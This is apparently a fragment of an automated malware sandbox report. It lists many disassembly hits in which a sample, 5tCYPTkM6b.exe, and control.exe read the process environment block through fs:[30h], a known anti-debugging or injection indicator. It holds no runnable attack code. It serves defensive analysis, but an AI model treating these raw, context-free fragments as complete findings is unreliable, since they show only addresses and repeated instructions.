Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h] 2_2_009C9100
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h] 2_2_009C9100
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C9100 mov eax, dword ptr fs:[00000030h] 2_2_009C9100
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009F513A mov eax, dword ptr fs:[00000030h] 2_2_009F513A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009F513A mov eax, dword ptr fs:[00000030h] 2_2_009F513A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h] 2_2_009E4120
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h] 2_2_009E4120
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h] 2_2_009E4120
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009E4120 mov eax, dword ptr fs:[00000030h] 2_2_009E4120
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009E4120 mov ecx, dword ptr fs:[00000030h] 2_2_009E4120
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h] 2_2_009EB944
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009EB944 mov eax, dword ptr fs:[00000030h] 2_2_009EB944
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h] 2_2_009CB171
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CB171 mov eax, dword ptr fs:[00000030h] 2_2_009CB171
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h] 2_2_009FD294
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009FD294 mov eax, dword ptr fs:[00000030h] 2_2_009FD294
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h] 2_2_009C52A5
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h] 2_2_009C52A5
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h] 2_2_009C52A5
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h] 2_2_009C52A5
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C52A5 mov eax, dword ptr fs:[00000030h] 2_2_009C52A5
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h] 2_2_00A7B260
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A7B260 mov eax, dword ptr fs:[00000030h] 2_2_00A7B260
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A98A62 mov eax, dword ptr fs:[00000030h] 2_2_00A98A62
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A0927A mov eax, dword ptr fs:[00000030h] 2_2_00A0927A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h] 2_2_009C9240
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h] 2_2_009C9240
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h] 2_2_009C9240
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C9240 mov eax, dword ptr fs:[00000030h] 2_2_009C9240
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A95BA5 mov eax, dword ptr fs:[00000030h] 2_2_00A95BA5
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h] 2_2_009D1B8F
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D1B8F mov eax, dword ptr fs:[00000030h] 2_2_009D1B8F
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A8138A mov eax, dword ptr fs:[00000030h] 2_2_00A8138A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A7D380 mov ecx, dword ptr fs:[00000030h] 2_2_00A7D380
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A8131B mov eax, dword ptr fs:[00000030h] 2_2_00A8131B
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CF358 mov eax, dword ptr fs:[00000030h] 2_2_009CF358
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CDB40 mov eax, dword ptr fs:[00000030h] 2_2_009CDB40
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A98B58 mov eax, dword ptr fs:[00000030h] 2_2_00A98B58
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CDB60 mov ecx, dword ptr fs:[00000030h] 2_2_009CDB60
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A814FB mov eax, dword ptr fs:[00000030h] 2_2_00A814FB
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A98CD6 mov eax, dword ptr fs:[00000030h] 2_2_00A98CD6
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h] 2_2_00A9740D
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h] 2_2_00A9740D
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A9740D mov eax, dword ptr fs:[00000030h] 2_2_00A9740D
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A81C06 mov eax, dword ptr fs:[00000030h] 2_2_00A81C06
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009FBC2C mov eax, dword ptr fs:[00000030h] 2_2_009FBC2C
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009E746D mov eax, dword ptr fs:[00000030h] 2_2_009E746D
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h] 2_2_00A5C450
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A5C450 mov eax, dword ptr fs:[00000030h] 2_2_00A5C450
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h] 2_2_009FFD9B
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009FFD9B mov eax, dword ptr fs:[00000030h] 2_2_009FFD9B
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h] 2_2_009C2D8A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h] 2_2_009C2D8A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h] 2_2_009C2D8A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h] 2_2_009C2D8A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C2D8A mov eax, dword ptr fs:[00000030h] 2_2_009C2D8A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009F35A1 mov eax, dword ptr fs:[00000030h] 2_2_009F35A1
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A78DF1 mov eax, dword ptr fs:[00000030h] 2_2_00A78DF1
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A98D34 mov eax, dword ptr fs:[00000030h] 2_2_00A98D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h] 2_2_009F4D3B
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h] 2_2_009F4D3B
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009F4D3B mov eax, dword ptr fs:[00000030h] 2_2_009F4D3B
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D3D34 mov eax, dword ptr fs:[00000030h] 2_2_009D3D34
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CAD30 mov eax, dword ptr fs:[00000030h] 2_2_009CAD30
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009E7D50 mov eax, dword ptr fs:[00000030h] 2_2_009E7D50
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A03D43 mov eax, dword ptr fs:[00000030h] 2_2_00A03D43
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A43540 mov eax, dword ptr fs:[00000030h] 2_2_00A43540
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h] 2_2_009EC577
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009EC577 mov eax, dword ptr fs:[00000030h] 2_2_009EC577
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A446A7 mov eax, dword ptr fs:[00000030h] 2_2_00A446A7
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h] 2_2_00A90EA5
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h] 2_2_00A90EA5
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A90EA5 mov eax, dword ptr fs:[00000030h] 2_2_00A90EA5
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A5FE87 mov eax, dword ptr fs:[00000030h] 2_2_00A5FE87
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009F36CC mov eax, dword ptr fs:[00000030h] 2_2_009F36CC
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A7FEC0 mov eax, dword ptr fs:[00000030h] 2_2_00A7FEC0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009F16E0 mov ecx, dword ptr fs:[00000030h] 2_2_009F16E0
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A98ED6 mov eax, dword ptr fs:[00000030h] 2_2_00A98ED6
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D76E2 mov eax, dword ptr fs:[00000030h] 2_2_009D76E2
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A7FE3F mov eax, dword ptr fs:[00000030h] 2_2_00A7FE3F
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h] 2_2_009CC600
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h] 2_2_009CC600
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CC600 mov eax, dword ptr fs:[00000030h] 2_2_009CC600
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009CE620 mov eax, dword ptr fs:[00000030h] 2_2_009CE620
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009D766D mov eax, dword ptr fs:[00000030h] 2_2_009D766D
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h] 2_2_00A9070D
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A9070D mov eax, dword ptr fs:[00000030h] 2_2_00A9070D
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009FE730 mov eax, dword ptr fs:[00000030h] 2_2_009FE730
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h] 2_2_009C4F2E
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009C4F2E mov eax, dword ptr fs:[00000030h] 2_2_009C4F2E
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h] 2_2_00A5FF10
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A5FF10 mov eax, dword ptr fs:[00000030h] 2_2_00A5FF10
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_00A98F6A mov eax, dword ptr fs:[00000030h] 2_2_00A98F6A
Source: C:\Users\user\Desktop\5tCYPTkM6b.exe Code function: 2_2_009DEF40 mov eax, dword ptr fs:[00000030h] 2_2_009DEF40
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438BC2C mov eax, dword ptr fs:[00000030h] 14_2_0438BC2C
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h] 14_2_043D6C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h] 14_2_043D6C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h] 14_2_043D6C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6C0A mov eax, dword ptr fs:[00000030h] 14_2_043D6C0A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04411C06 mov eax, dword ptr fs:[00000030h] 14_2_04411C06
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0442740D mov eax, dword ptr fs:[00000030h] 14_2_0442740D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0442740D mov eax, dword ptr fs:[00000030h] 14_2_0442740D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0442740D mov eax, dword ptr fs:[00000030h] 14_2_0442740D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437746D mov eax, dword ptr fs:[00000030h] 14_2_0437746D
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043EC450 mov eax, dword ptr fs:[00000030h] 14_2_043EC450
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043EC450 mov eax, dword ptr fs:[00000030h] 14_2_043EC450
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438A44B mov eax, dword ptr fs:[00000030h] 14_2_0438A44B
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04428CD6 mov eax, dword ptr fs:[00000030h] 14_2_04428CD6
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436849B mov eax, dword ptr fs:[00000030h] 14_2_0436849B
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_044114FB mov eax, dword ptr fs:[00000030h] 14_2_044114FB
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6CF0 mov eax, dword ptr fs:[00000030h] 14_2_043D6CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6CF0 mov eax, dword ptr fs:[00000030h] 14_2_043D6CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6CF0 mov eax, dword ptr fs:[00000030h] 14_2_043D6CF0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04363D34 mov eax, dword ptr fs:[00000030h] 14_2_04363D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04384D3B mov eax, dword ptr fs:[00000030h] 14_2_04384D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04384D3B mov eax, dword ptr fs:[00000030h] 14_2_04384D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04384D3B mov eax, dword ptr fs:[00000030h] 14_2_04384D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435AD30 mov eax, dword ptr fs:[00000030h] 14_2_0435AD30
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043DA537 mov eax, dword ptr fs:[00000030h] 14_2_043DA537
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437C577 mov eax, dword ptr fs:[00000030h] 14_2_0437C577
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0437C577 mov eax, dword ptr fs:[00000030h] 14_2_0437C577
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04377D50 mov eax, dword ptr fs:[00000030h] 14_2_04377D50
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04428D34 mov eax, dword ptr fs:[00000030h] 14_2_04428D34
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441E539 mov eax, dword ptr fs:[00000030h] 14_2_0441E539
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04393D43 mov eax, dword ptr fs:[00000030h] 14_2_04393D43
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D3540 mov eax, dword ptr fs:[00000030h] 14_2_043D3540
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04381DB5 mov eax, dword ptr fs:[00000030h] 14_2_04381DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04381DB5 mov eax, dword ptr fs:[00000030h] 14_2_04381DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04381DB5 mov eax, dword ptr fs:[00000030h] 14_2_04381DB5
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043835A1 mov eax, dword ptr fs:[00000030h] 14_2_043835A1
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438FD9B mov eax, dword ptr fs:[00000030h] 14_2_0438FD9B
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438FD9B mov eax, dword ptr fs:[00000030h] 14_2_0438FD9B
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0441FDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0441FDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0441FDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441FDE2 mov eax, dword ptr fs:[00000030h] 14_2_0441FDE2
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04408DF1 mov eax, dword ptr fs:[00000030h] 14_2_04408DF1
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04382581 mov eax, dword ptr fs:[00000030h] 14_2_04382581
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04382581 mov eax, dword ptr fs:[00000030h] 14_2_04382581
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04382581 mov eax, dword ptr fs:[00000030h] 14_2_04382581
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04382581 mov eax, dword ptr fs:[00000030h] 14_2_04382581
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h] 14_2_04352D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h] 14_2_04352D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h] 14_2_04352D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h] 14_2_04352D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_04352D8A mov eax, dword ptr fs:[00000030h] 14_2_04352D8A
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0436D5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0436D5E0 mov eax, dword ptr fs:[00000030h] 14_2_0436D5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_044205AC mov eax, dword ptr fs:[00000030h] 14_2_044205AC
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_044205AC mov eax, dword ptr fs:[00000030h] 14_2_044205AC
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h] 14_2_043D6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h] 14_2_043D6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h] 14_2_043D6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6DC9 mov ecx, dword ptr fs:[00000030h] 14_2_043D6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h] 14_2_043D6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_043D6DC9 mov eax, dword ptr fs:[00000030h] 14_2_043D6DC9
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441AE44 mov eax, dword ptr fs:[00000030h] 14_2_0441AE44
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0441AE44 mov eax, dword ptr fs:[00000030h] 14_2_0441AE44
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435E620 mov eax, dword ptr fs:[00000030h] 14_2_0435E620
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438A61C mov eax, dword ptr fs:[00000030h] 14_2_0438A61C
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0438A61C mov eax, dword ptr fs:[00000030h] 14_2_0438A61C
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435C600 mov eax, dword ptr fs:[00000030h] 14_2_0435C600
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435C600 mov eax, dword ptr fs:[00000030h] 14_2_0435C600
Source: C:\Windows\SysWOW64\control.exe Code function: 14_2_0435C600 mov eax, dword ptr fs:[00000030h] 14_2_0435C600
